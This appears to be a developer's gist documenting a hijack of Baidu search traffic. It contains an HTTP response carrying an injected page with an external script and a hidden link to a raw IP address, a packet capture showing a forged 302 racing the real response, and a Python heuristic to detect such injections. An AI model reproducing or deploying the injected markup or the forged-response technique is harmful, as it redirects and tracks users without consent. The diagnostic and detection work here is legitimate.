@nevill
Last active August 29, 2015 14:06
Baidu Hijack

Response URL could be: http://9v.c1o1.com/b/location.php?gxsg_url=aHR0cDovL3d3dy5iYWlkdS5jb20vcz9pZT1VVEYtOCZ3ZD1qYXZhJnRuPTk5NzE0NjExX2hhb19wZw==&rurl=aHR0cDovL3d3dy5iYWlkdS5jb20vcz9pZT1VVEYtOCZ3ZD1qYXZh

~ $ http -v get "http://www.baidu.com/s?ie=UTF-8&wd=apple" User-Agent:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.122 Safari/537.36"

GET /s?ie=UTF-8&wd=apple HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, compress
Host: www.baidu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.122 Safari/537.36


HTTP/1.1 200 OK
Cache-Control:no-cache
Cache-Control:no-store
Cache-Control:private
Connection: close
Content-Length: 861
Content-Type: text/html
Date: Tue, 31 Aug 2017 06:20:14 GMT
Server: Apache/1.2.6

<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="pragma" content="no-cache" /><script defer type="text/javascript" src="http://gdprob.b0.upaiyun.com/th/sh0101/ver_sh0101_92/th1009.js"></script></head><body style='margin:0px;overflow-x:hidden;overflow-y:hidden;'><input type="hidden" id="a5" value="http://117.21.173.168:8888/ash4.html"/><input type="hidden" id="m5" value="http://www.baidu.com/s?ie=UTF-8&wd=apple"/><input type="hidden" id="u5" value=""/><input type="hidden" id="a6" value="10034"/><input type="hidden" id="fg" value="1"/><input type="hidden" id="a7" value="sh0101"/><input type="hidden" id="d1" value="1411795908"/></body><script>setTimeout(function(){var a=document.getElementById("fg").value;var b=document.getElementById("m5").value;if(a==1){window.location.href=b};},5000);</script></html>

11:29:35.387693 IP (tos 0x0, ttl 63, id 50801, offset 0, flags [DF], proto TCP (6), length 64)
116.2xx.x.x.53587 > 115.239.211.110.80: Flags [S], cksum 0x5f8f (correct), seq 895062881, win 65535, options [mss 1452,nop,wscale 4,nop,nop,TS val 783494939 ecr 0,sackOK,eol], length 0
0x0000: 4500 0040 c671 4000 3f06 95fc 74ea 2302 E..@.q@.?...t.#.
0x0010: 73ef d36e d153 0050 3559 9361 0000 0000 s..n.S.P5Y.a....
0x0020: b002 ffff 5f8f 0000 0204 05ac 0103 0304 ...._...........
0x0030: 0101 080a 2eb3 2f1b 0000 0000 0402 0000 ....../.........
11:29:35.394412 IP (tos 0x0, ttl 55, id 50801, offset 0, flags [DF], proto TCP (6), length 64)
115.239.211.110.80 > 116.2xx.x.x.53587: Flags [S.], cksum 0x2bbb (correct), seq 117149092, ack 895062882, win 65535, options [mss 1440,nop,wscale 7,nop,nop,nop,nop,nop,nop,nop,nop,nop,nop,nop,nop,sackOK,eol], length 0
0x0000: 4500 0040 c671 4000 3706 9dfc 73ef d36e E..@.q@.7...s..n
0x0010: 74ea 2302 0050 d153 06fb 8da4 3559 9362 t.#..P.S....5Y.b
0x0020: b012 ffff 2bbb 0000 0204 05a0 0103 0307 ....+...........
0x0030: 0101 0101 0101 0101 0101 0101 0402 0000 ................
11:29:35.395600 IP (tos 0x0, ttl 63, id 51573, offset 0, flags [DF], proto TCP (6), length 40)
116.2xx.x.x.53587 > 115.239.211.110.80: Flags [.], cksum 0x618a (correct), seq 895062882, ack 117149093, win 16384, length 0
0x0000: 4500 0028 c975 4000 3f06 9310 74ea 2302 E..(.u@.?...t.#.
0x0010: 73ef d36e d153 0050 3559 9362 06fb 8da5 s..n.S.P5Y.b....
0x0020: 5010 4000 618a 0000 P.@.a...
11:29:35.395719 IP (tos 0x0, ttl 63, id 10431, offset 0, flags [DF], proto TCP (6), length 214)
116.2xx.x.x.53587 > 115.239.211.110.80: Flags [P.], cksum 0x7e71 (correct), seq 895062882:895063056, ack 117149093, win 16384, length 174
0x0000: 4500 00d6 28bf 4000 3f06 3319 74ea 2302 E...(.@.?.3.t.#.
0x0010: 73ef d36e d153 0050 3559 9362 06fb 8da5 s..n.S.P5Y.b....
0x0020: 5018 4000 7e71 0000 4745 5420 2f73 3f77 P.@.~q..GET./s?w
0x0030: 643d 6261 6279 2670 6e3d 3130 266f 713d d=baby&pn=10&oq=
0x0040: 2545 3625 3839 2542 4525 4535 2538 3125 %E6%89%BE%E5%81%
0x0050: 3943 2545 3825 4244 2541 3625 4535 2539 9C%E8%BD%A6%E5%9
0x0060: 4325 4241 2669 653d 7574 662d 3826 7273 C%BA&ie=utf-8&rs
0x0070: 765f 7061 6765 3d31 2666 3d38 2672 7376 v_page=1&f=8&rsv
0x0080: 5f62 703d 3126 746e 3d62 6169 6475 2048 _bp=1&tn=baidu.H
0x0090: 5454 502f 312e 310d 0a55 7365 722d 4167 TTP/1.1..User-Ag
0x00a0: 656e 743a 2063 7572 6c2f 372e 3330 2e30 ent:.curl/7.30.0
0x00b0: 0d0a 486f 7374 3a20 7777 772e 6261 6964 ..Host:.www.baid
0x00c0: 752e 636f 6d0d 0a41 6363 6570 743a 202a u.com..Accept:.*
0x00d0: 2f2a 0d0a 0d0a /*....
11:29:35.402926 IP (tos 0x0, ttl 53, id 36624, offset 0, flags [DF], proto TCP (6), length 40)
115.239.211.110.80 > 116.2xx.x.x.53587: Flags [.], cksum 0xa012 (correct), seq 117149093, ack 895063056, win 202, length 0
0x0000: 4500 0028 8f10 4000 3506 d775 73ef d36e E..(..@.5..us..n
0x0010: 74ea 2302 0050 d153 06fb 8da5 3559 9410 t.#..P.S....5Y..
0x0020: 5010 00ca a012 0000 P.......
11:29:35.476775 IP (tos 0x0, ttl 58, id 2, offset 0, flags [none], proto TCP (6), length 275)
115.239.211.110.80 > 116.2xx.x.x.53587: Flags [FP.], cksum 0xfa9f (correct), seq 117149093:117149328, ack 895063056, win 256, length 235
0x0000: 4500 0113 0002 0000 3a06 a099 73ef d36e E.......:...s..n
0x0010: 74ea 2302 0050 d153 06fb 8da5 3559 9410 t.#..P.S....5Y..
0x0020: 5019 0100 fa9f 0000 4854 5450 2f31 2e31 P.......HTTP/1.1
0x0030: 2033 3032 204d 6f76 6564 2050 6572 6d61 .302.Moved.Perma
0x0040: 6e65 6e74 6c79 0d0a 4c6f 6361 7469 6f6e nently..Location
0x0050: 3a20 6874 7470 3a2f 2f77 7777 2e62 6169 :.http://www.bai
0x0060: 6475 2e63 6f6d 2f73 3f77 643d 6261 6279 du.com/s?wd=baby
0x0070: 2670 6e3d 3130 266f 713d 2545 3625 3839 &pn=10&oq=%E6%89
0x0080: 2542 4525 4535 2538 3125 3943 2545 3825 %BE%E5%81%9C%E8%
0x0090: 4244 2541 3625 4535 2539 4325 4241 2669 BD%A6%E5%9C%BA&i
0x00a0: 653d 7574 662d 3826 7273 765f 7061 6765 e=utf-8&rsv_page
0x00b0: 3d31 2666 3d38 2672 7376 5f62 703d 3126 =1&f=8&rsv_bp=1&
0x00c0: 746e 3d39 3338 3433 3336 375f 6861 6f5f tn=93843367_hao_
0x00d0: 7067 0d0a 436f 6e6e 6563 7469 6f6e 3a20 pg..Connection:.
0x00e0: 636c 6f73 650d 0a43 6f6e 7465 6e74 2d54 close..Content-T
0x00f0: 7970 653a 7465 7874 2f68 746d 6c0d 0a43 ype:text/html..C
0x0100: 6f6e 7465 6e74 2d6c 656e 6774 683a 300d ontent-length:0.
0x0110: 0a0d 0a ...
11:29:35.478010 IP (tos 0x0, ttl 63, id 34286, offset 0, flags [DF], proto TCP (6), length 40)
116.2xx.x.x.53587 > 115.239.211.110.80: Flags [.], cksum 0x5fff (correct), seq 895063056, ack 117149329, win 16369, length 0
0x0000: 4500 0028 85ee 4000 3f06 d697 74ea 2302 E..(..@.?...t.#.
0x0010: 73ef d36e d153 0050 3559 9410 06fb 8e91 s..n.S.P5Y......
0x0020: 5010 3ff1 5fff 0000 P.?._...
11:29:35.478507 IP (tos 0x0, ttl 63, id 61409, offset 0, flags [DF], proto TCP (6), length 40)
116.2xx.x.x.53587 > 115.239.211.110.80: Flags [F.], cksum 0x5fef (correct), seq 895063056, ack 117149329, win 16384, length 0
0x0000: 4500 0028 efe1 4000 3f06 6ca4 74ea 2302 E..(..@.?.l.t.#.
0x0010: 73ef d36e d153 0050 3559 9410 06fb 8e91 s..n.S.P5Y......
0x0020: 5011 4000 5fef 0000 P.@._...
11:29:35.552919 IP (tos 0x0, ttl 53, id 36625, offset 0, flags [DF], proto TCP (6), length 770)
115.239.211.110.80 > 116.2xx.x.x.53587: Flags [P.], cksum 0x894c (correct), seq 117149093:117149823, ack 895063056, win 202, length 730
0x0000: 4500 0302 8f11 4000 3506 d49a 73ef d36e E.....@.5...s..n
0x0010: 74ea 2302 0050 d153 06fb 8da5 3559 9410 t.#..P.S....5Y..
0x0020: 5018 00ca 894c 0000 4854 5450 2f31 2e31 P....L..HTTP/1.1
0x0030: 2032 3030 204f 4b0d 0a44 6174 653a 2054 .200.OK..Date:.T
0x0040: 7565 2c20 3037 204f 6374 2032 3031 3420 ue,.07.Oct.2014.
0x0050: 3131 3a32 393a 3335 2047 4d54 0d0a 436f 11:29:35.GMT..Co
0x0060: 6e74 656e 742d 5479 7065 3a20 7465 7874 ntent-Type:.text
0x0070: 2f68 746d 6c3b 6368 6172 7365 743d 7574 /html;charset=ut
0x0080: 662d 380d 0a54 7261 6e73 6665 722d 456e f-8..Transfer-En
0x0090: 636f 6469 6e67 3a20 6368 756e 6b65 640d coding:.chunked.
0x00a0: 0a43 6f6e 6e65 6374 696f 6e3a 204b 6565 .Connection:.Kee
0x00b0: 702d 416c 6976 650d 0a56 6172 793a 2041 p-Alive..Vary:.A
0x00c0: 6363 6570 742d 456e 636f 6469 6e67 0d0a ccept-Encoding..
0x00d0: 5365 742d 436f 6f6b 6965 3a20 4241 4944 Set-Cookie:.BAID
0x00e0: 5549 443d 3434 3434 3033 3934 4634 3141 UID=44440394F41A
0x00f0: 3932 4645 4130 3245 4431 3834 3743 3532 92FEA02ED1847C52
0x0100: 3842 4244 3a46 473d 313b 2065 7870 6972 8BBD:FG=1;.expir
0x0110: 6573 3d54 6875 2c20 3331 2d44 6563 2d33 es=Thu,.31-Dec-3
0x0120: 3720 3233 3a35 353a 3535 2047 4d54 3b20 7.23:55:55.GMT;.
0x0130: 6d61 782d 6167 653d 3231 3437 3438 3336 max-age=21474836
0x0140: 3437 3b20 7061 7468 3d2f 3b20 646f 6d61 47;.path=/;.doma
0x0150: 696e 3d2e 6261 6964 752e 636f 6d0d 0a53 in=.baidu.com..S
0x0160: 6574 2d43 6f6f 6b69 653a 2042 445f 434b et-Cookie:.BD_CK

A request that might trigger the hijack:
http://www.baidu.com/s?wd=%E6%89%BE%E5%81%9C%E8%BD%A6%E5%9C%BA&pn=10&oq=%E6%89%BE%E5%81%9C%E8%BD%A6%E5%9C%BA&ie=utf-8&rsv_page=1&f=8&rsv_bp=1&tn=baidu
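
An added example, not part of the original gist: a heuristic check over tcpdump-style header lines that flags server segments starting at the same TCP sequence number but disagreeing in length or TTL, as the 302 segment (ttl 58, id 2, flags [none]) and the 200 segment (ttl 53, id 36625) in the capture above do. The function names are this example's own; the sample lines are copied from the capture with the hex payload omitted.

```python
import re
from collections import defaultdict

# Header lines copied from the capture above (hex payload omitted).
CAPTURE = """\
11:29:35.402926 IP (tos 0x0, ttl 53, id 36624, offset 0, flags [DF], proto TCP (6), length 40)
115.239.211.110.80 > 116.2xx.x.x.53587: Flags [.], cksum 0xa012 (correct), seq 117149093, ack 895063056, win 202, length 0
11:29:35.476775 IP (tos 0x0, ttl 58, id 2, offset 0, flags [none], proto TCP (6), length 275)
115.239.211.110.80 > 116.2xx.x.x.53587: Flags [FP.], cksum 0xfa9f (correct), seq 117149093:117149328, ack 895063056, win 256, length 235
11:29:35.552919 IP (tos 0x0, ttl 53, id 36625, offset 0, flags [DF], proto TCP (6), length 770)
115.239.211.110.80 > 116.2xx.x.x.53587: Flags [P.], cksum 0x894c (correct), seq 117149093:117149823, ack 895063056, win 202, length 730
"""

IP_RE = re.compile(r"^(\S+) IP \(.*?ttl (\d+), id (\d+),.*?flags \[(\w+)\]")
TCP_RE = re.compile(r"^(\S+) > (\S+): Flags \[([^\]]+)\],.*?seq (\d+)(?::(\d+))?,.*length (\d+)$")

def payload_segments(text):
    """Yield one dict per TCP segment that carries payload (length > 0)."""
    ip = None
    for line in text.splitlines():
        line = line.strip()
        m = IP_RE.match(line)
        if m:
            ip = {"time": m[1], "ttl": int(m[2]), "ip_id": int(m[3]), "ip_flags": m[4]}
            continue
        m = TCP_RE.match(line)
        if m and ip and int(m[6]) > 0:
            yield {**ip, "flow": (m[1], m[2]), "tcp_flags": m[3],
                   "seq": int(m[4]), "length": int(m[6])}
        ip = None  # hex-dump and TCP lines end the current packet header

def find_conflicts(text):
    """Group payload segments by (flow, starting seq) and return the groups
    whose members disagree, i.e. two different answers for the same bytes."""
    by_seq = defaultdict(list)
    for seg in payload_segments(text):
        by_seq[(seg["flow"], seg["seq"])].append(seg)
    # Heuristic: a genuine retransmission normally repeats length and TTL.
    return [segs for segs in by_seq.values()
            if len({(s["length"], s["ttl"]) for s in segs}) > 1]

if __name__ == "__main__":
    for segs in find_conflicts(CAPTURE):
        for s in segs:
            print(s["time"], "ttl", s["ttl"], "id", s["ip_id"], s["ip_flags"], s["tcp_flags"], "len", s["length"])
```

A flagged group is a lead for manual review rather than proof: compare the TTL, IP ID and DF bit of each member against the other packets the same server sent on that connection.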